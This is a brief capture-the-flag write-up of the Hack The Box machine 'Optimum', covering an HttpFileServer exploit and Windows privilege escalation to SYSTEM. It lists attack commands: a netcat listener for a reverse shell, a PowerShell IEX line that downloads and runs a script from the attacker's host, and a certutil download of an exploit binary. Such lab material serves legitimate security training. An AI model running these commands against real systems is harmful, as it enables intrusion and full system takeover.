Hackthebox - Optimum
Last updated
Last updated
Windows
If we google it we find this exploit right away
We have to get nc.exe in our attacking machine. Kali has binaries hosted so we can just copy and paste it in our working dir like this cp /usr/share/windows-resources/binaries/nc.exe .
We have to serve netcat using python http server python3 -m http.server 80
Then we have to modify the script and add our ip address and our port (I left 443)
We set a listener rlwrap nc -lvp 443
We launch our exploit python2 39161 10.10.10.8 80
Win version
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -
Let's find another exploit than the one mentioned in Sherlock (does not work) searchsploit ms16-032
Tried a few exploits but none worked
On google I found this
And in the comment they mention this exe file
We download it in our kali
Serve it with python
certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe get it in our target
We launch it we get a system shell
We can grab the root flag
We have an HttpFile Server
And we get a shell
We can grab the user flag
